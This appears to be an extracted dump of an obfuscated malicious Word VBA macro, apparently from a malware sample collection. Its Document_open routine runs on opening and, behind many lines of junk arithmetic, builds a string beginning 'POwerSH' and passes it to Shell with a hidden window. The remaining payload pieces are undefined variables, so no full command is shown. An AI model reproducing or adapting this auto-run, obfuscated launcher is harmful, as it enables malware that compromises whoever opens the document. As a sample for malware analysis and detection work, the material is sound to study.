Filename     : ./macros/154a8f02df08f96cd8e57cc8d8e89656f9494b6ab8176ef3635bc99bc96f7d3d
OLE stream   : Macros/VBA/GXfzSDiOmJqOD
VBA filename : GXfzSDiOmJqOD.cls
----------------------------------------
Attribute VB_Name = "GXfzSDiOmJqOD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQLbrLXo()
On Error Resume Next
PMkYiM = CDate(75501)
jdtWH = 48982
oYjIw = CByte(PuUln)
kzljH = YrsTT
rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993))
zEOJUP = 46860
MWiJo = CDate(62034)
dbStLb = 18717
djEtDa = CByte(haDCXa)
mYQhjR = AQYOv
zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441))
Cmddj = 87611
DwDHu = CDate(69757)
vktfBi = 60251
NtqAG = CByte(XQPjO)
OoCiWN = SYjzhm
VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347))
RCJbfq = 18848
fUsAOw = CDate(54980)
iiVliB = 26179
NJjZjv = CByte(qXTGOu)
EVXSE = jvmmw
HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322))
simPG = 97365
EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU
vwduX = CDate(48506)
ABwlG = 63580
kKJGVp = CByte(jvsaK)
ljQJf = jupwo
sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621))
DYDOj = 44621
hUOAlj = CDate(66037)
jBUXzB = 38200
pIIYs = CByte(XrOGP)
vmjjp = RtMMn
lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913))
mNSXk = 76530
End Function
Function XJjvnpd(NPbjQYk)
On Error Resume Next
TVLjj = CDate(93213)
XKUYAa = 12395
HSradT = CByte(ovQEM)
lKAZZ = GfbbE
FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680))
JoQikh = 34016
iWEYQ = CDate(49721)
mUfKzN = 63275
wdrJuq = CByte(ZvwjSi)
uTqrio = zvNpI
bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336))
bwHWX = 60950
wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862)
nsCUa = CDate(42715)
RwHhu = 10027
UcMrh = CByte(KdzjXs)
IWuzz = ziWPY
wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257))
nGYUXF = 87114
End Function
Private Sub Document_open()
On Error Resume Next
LAfvS = CDate(6602)
hPFif = 71984
ZPrHW = CByte(wSzqB)
iICao = YdWqiN
YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435))
TnfcN = 43280
AfXkv = CDate(13862)
Fzjtw = 20384
iijAM = CByte(QRJAcj)
pVmlCd = zdHzaZ
ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390))
zrYzEz = 88236
Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf
XUYjHj = CDate(21966)
kCGkir = 479
zLfkv = CByte(UAWAC)
AYXYcD = EcQdXd
FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381))
jPzja = 56499
UGHpt = CDate(12357)
FokVEF = 31195
wLkoRf = CByte(NjnhHo)
VtCSw = VCtTdN
ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432))
MJGYm = 42049
End Sub

